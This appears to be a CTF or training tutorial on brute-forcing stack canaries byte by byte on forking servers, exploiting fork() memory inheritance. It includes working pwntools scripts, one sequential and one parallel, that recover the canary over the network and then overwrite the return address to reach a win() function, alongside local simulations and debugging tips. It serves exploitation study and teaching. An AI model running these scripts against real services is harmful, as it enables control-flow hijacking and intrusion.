Canary Brute-Force on Forking Servers: Byte-by-Byte Enumeration Exploiting fork() Memory Inheritance
Theory
Why This Matters
Forking servers (Apache prefork and many CTF challenge servers are typical examples) call fork() to handle each connection. The child process inherits an exact copy of the parent's memory, including the master canary stored in TLS at fs:0x28. Because the canary is the same across all forks of the same parent process, it can be brute-forced byte by byte without an explicit information-leak primitive. On x86-64 Linux the canary's low byte is always 0x00, so at most 256 × 7 = 1792 guesses are needed to recover the remaining 7 bytes. NICE K0168 and S0131 require understanding this forking-server property and how to implement an efficient byte-by-byte oracle. This is the standard technique when no format string or other info-leak is available.
Core Concept
fork() creates a child process with a copy of the parent's address space, including:
- Stack contents (and therefore the canary on the stack at the point of fork)
- TLS segment at fs:0x28 (the master canary value)
- Heap, globals, and all other memory
The child's canary is identical to the parent's. When the child crashes (SIGSEGV or __stack_chk_fail), the parent continues and the next fork() call creates another child with the same canary. This gives an attacker an unlimited oracle: send a candidate canary, observe whether the process crashes or continues, repeat.
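The inheritance property can be observed without a vulnerable binary. The following is a minimal sketch, assuming a POSIX system: the parent picks a random 8-byte value once (a stand-in for the canary, not the real value at fs:0x28) and forks several children, each of which reports the value it sees through a pipe. The names SECRET and secrets_seen_by_children are illustrative only.

```python
import os

# Stand-in for the master canary: chosen once in the parent, before any fork().
SECRET = os.urandom(8)

def secrets_seen_by_children(n_children=3):
    """Fork n_children processes and return the secret each child observes."""
    seen = []
    for _ in range(n_children):
        read_fd, write_fd = os.pipe()
        pid = os.fork()
        if pid == 0:
            # Child: its memory is a copy of the parent's, SECRET included.
            os.close(read_fd)
            os.write(write_fd, SECRET)
            os._exit(0)
        # Parent: collect the child's report, then reap the child.
        os.close(write_fd)
        seen.append(os.read(read_fd, 8))
        os.close(read_fd)
        os.waitpid(pid, 0)
    return seen

if __name__ == "__main__":
    for value in secrets_seen_by_children():
        print(value.hex())
```

Every child prints the same value, because none of them re-initialises it after fork(). A real canary behaves the same way for as long as the parent process stays alive.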
Byte-by-byte oracle: instead of guessing all 8 bytes at once (256^8 attempts), guess one byte at a time:
- Fix the known prefix (start with \x00 for byte 0; on x86-64 Linux the canary's low byte is always null)
- Try all 256 values for byte 1: send an overflow that ends exactly at the byte being guessed, i.e. padding + \x00 + candidate_byte and nothing after it, so the remaining canary bytes, saved RBP, and saved RIP stay intact
- If the process does not crash (or responds normally), the candidate byte is correct
- Move to byte 2, keep byte 1 fixed, repeat
Total attempts: 1 (byte 0, always \x00) + 256×7 = 1793 attempts maximum. Average: 1 + 128×7 = 897 attempts.
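The guess counts can be checked against a local simulation. The sketch below replaces the network oracle with a hypothetical in-process function, make_oracle, that "survives" only when the bytes written over the canary match its prefix. recover_canary then runs the byte-by-byte search and counts the guesses. No real server is involved, and the sample canary value is arbitrary.

```python
def make_oracle(secret):
    """Return a function simulating a forked child: True means 'no crash'."""
    def oracle(probe):
        # Only the overwritten prefix changes; the rest of the canary is intact.
        return secret[:len(probe)] == probe
    return oracle

def recover_canary(oracle, length=8):
    """Byte-by-byte search; returns (canary, number_of_guesses)."""
    known = b"\x00"  # low byte assumed to be 0x00, as on x86-64 Linux
    guesses = 0
    while len(known) < length:
        for candidate in range(256):
            guesses += 1
            if oracle(known + bytes([candidate])):
                known += bytes([candidate])
                break
        else:
            raise RuntimeError(f"no candidate survived at byte {len(known)}")
    return known, guesses

if __name__ == "__main__":
    secret = bytes.fromhex("00a1b2c3d4e5f6ff")  # arbitrary example value
    canary, guesses = recover_canary(make_oracle(secret))
    print(canary.hex(), guesses)
```

When every unknown byte is 0xff, the search needs the full 256 × 7 = 1792 guesses. The fixed byte 0 costs no guess in this simulation.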
Detecting crash vs. success: the oracle response depends on the server's behavior:
- Connection closed without response: crash (SIGSEGV or __stack_chk_fail)
- Connection sends expected response: success — candidate byte is correct
Technical Deep-Dive
from pwn import *
import sys

HOST = 'localhost'
PORT = 9999
BUF_SIZE = 64  # bytes needed to reach the canary; adjust for your target

def try_canary(canary_bytes):
    """Send overflow with candidate canary prefix; return True if process survives."""
    r = None
    try:
        r = remote(HOST, PORT, timeout=2)
        r.recvuntil(b'Input: ', timeout=2)
        payload = b'A' * BUF_SIZE   # fill buffer
        payload += canary_bytes     # known prefix + candidate byte, nothing after it
        # send(), not sendline(): a trailing newline would clobber the next
        # canary byte (assumes the target reads raw bytes, e.g. with read())
        r.send(payload)
        # If the server echoes back something / sends a menu again: success
        response = r.recv(timeout=1)
        return len(response) > 0
    except Exception:
        # EOFError or a reset means the child died: wrong candidate
        return False
    finally:
        if r is not None:
            r.close()

def brute_canary():
    canary = b'\x00'  # low byte always 0x00
    for byte_idx in range(1, 8):
        found = False
        for candidate in range(0x00, 0x100):
            # Overwrite only up to the byte being guessed; the remaining
            # canary bytes keep their real values
            probe = canary + bytes([candidate])
            if try_canary(probe):
                canary += bytes([candidate])
                log.info(f'Byte {byte_idx}: {candidate:#04x} canary so far: {canary.hex()}')
                found = True
                break
        if not found:
            log.error(f'Failed at byte {byte_idx}')
            sys.exit(1)
    return canary

canary = brute_canary()
log.success(f'Full canary: {canary.hex()} = {u64(canary):#018x}')

# Now use the leaked canary for the real exploit
r = remote(HOST, PORT)
r.recvuntil(b'Input: ')
payload = b'A' * BUF_SIZE
payload += canary
payload += p64(0xdeadbeef)  # saved RBP
payload += p64(0x401234)    # win() address
r.sendline(payload)
r.interactive()
Timing optimization: parallelise byte guesses per position — send 256 connections simultaneously (or in batches), observe which one succeeds. This reduces wall-clock time from minutes to seconds:
from concurrent.futures import ThreadPoolExecutor, as_completed

def check_byte(candidate, known_prefix):
    # Probe ends at the guessed byte so later canary bytes stay untouched
    probe = known_prefix + bytes([candidate])
    return candidate, try_canary(probe)

canary = b'\x00'
for byte_idx in range(1, 8):
    found = None
    with ThreadPoolExecutor(max_workers=32) as executor:
        futures = [executor.submit(check_byte, c, canary) for c in range(0x100)]
        for future in as_completed(futures):
            candidate, success = future.result()
            if success:
                found = candidate
                break
        # Leaving the with-block waits for the probes still in flight
    if found is None:
        log.error(f'Failed at byte {byte_idx}')  # raises, so the loop stops here
    canary += bytes([found])
    log.info(f'Byte {byte_idx}: {found:#04x}')
Reverse Engineering Methodology
- Confirm the server forks: strace -e trace=clone,fork ./server or pstree during a connection to see if child processes spawn. A new PID per connection confirms forking.
- Confirm the canary is consistent: attach a debugger to two different children (or inspect two core dumps) and compare the canary value at fs:0x28. If the values differ, the server does not fork, or it re-randomises (for example by calling execve() after fork(), which gives the new image a fresh canary).
- Find the buffer-to-canary offset: run the server under a debugger, send cyclic(200), and break at the canary check. cyclic_find() on the low 4 bytes of the value that replaced the canary gives the number of bytes that fill the buffer before the canary position. Without debugger access, grow the input one byte at a time: the longest input that does not crash the child is the offset.
- Automate with pwntools: use remote() in a loop with appropriate timeout settings. When the child dies, the connection is closed or reset, which pwntools typically surfaces as an EOFError on the next recv(). Catch it to detect the "wrong candidate" case.
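When no debugger is available, the buffer-to-canary offset can be found through the same crash oracle. This is a minimal sketch, assuming the oracle is any callable that takes a raw payload and returns True when the child survives. find_canary_offset and fake_target are hypothetical names, and fake_target only simulates a target locally.

```python
def find_canary_offset(survives, max_len=512, pad=b"A"):
    """Return the largest payload length that does not crash the child.

    Padding of exactly `offset` bytes fills the buffer; one byte more
    overwrites the canary's low byte (0x00) with `pad` and triggers a crash.
    """
    for length in range(1, max_len + 1):
        if not survives(pad * length):
            return length - 1
    return None  # no crash observed within max_len bytes

def fake_target(buf_size, canary):
    """Simulated vulnerable child: survives if the canary region is unchanged."""
    def survives(payload):
        overflow = payload[buf_size:buf_size + len(canary)]
        return canary[:len(overflow)] == overflow
    return survives

if __name__ == "__main__":
    oracle = fake_target(64, bytes.fromhex("00112233445566aa"))
    print(find_canary_offset(oracle))
```

The linear scan costs one connection per byte of padding. Because survival is monotonic in the payload length, a binary search over the length would also work if connections are expensive.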
Common Reversing Errors
- Assuming all servers are forking: thread-based servers do not fork. All threads share one process-wide canary, but a failed canary check aborts the whole process, not just the thread handling your connection. If a supervisor restarts the server, it comes back with a fresh canary and every byte recovered so far is lost, so the oracle breaks.
- Including wrong null byte in byte 0: the canary's first byte is always \x00. If you start the probe with a non-null byte 0, every attempt at byte 1 will fail because the canary comparison fails at byte 0. Always fix byte 0 as \x00.
- Slow sequential guessing making the challenge time out: many CTF challenges have connection rate limits or total time limits. Use parallelism (as shown above) to complete the brute force within a minute rather than an hour.
- Mistaking a canary check failure for the overflow itself: __stack_chk_fail calls abort(), which raises SIGABRT. The process exits with signal 6, not SIGSEGV (signal 11). Both result in connection closure, but if you have shell access, checking $? or dmesg distinguishes them.
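When the target can be run locally, the two failure modes can be told apart from the exit status. This is a minimal sketch using only the Python standard library. death_signal is a hypothetical helper that runs a command and reports which signal killed it. The two child commands are stand-ins that abort or signal themselves deliberately; they are not a real vulnerable server.

```python
import signal
import subprocess
import sys

def death_signal(argv):
    """Run argv; return the name of the signal that killed it, or None."""
    proc = subprocess.run(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    if proc.returncode < 0:
        # subprocess reports death by signal N as returncode -N
        return signal.Signals(-proc.returncode).name
    return None

if __name__ == "__main__":
    # Stand-in for __stack_chk_fail: abort() raises SIGABRT (signal 6).
    print(death_signal([sys.executable, "-c", "import os; os.abort()"]))
    # Stand-in for a corrupted return address: the process dies with SIGSEGV (signal 11).
    print(death_signal([sys.executable, "-c",
                        "import os, signal; os.kill(os.getpid(), signal.SIGSEGV)"]))
```

In a bash shell the same distinction shows up in $? as 134 (128 + 6) for SIGABRT and 139 (128 + 11) for SIGSEGV.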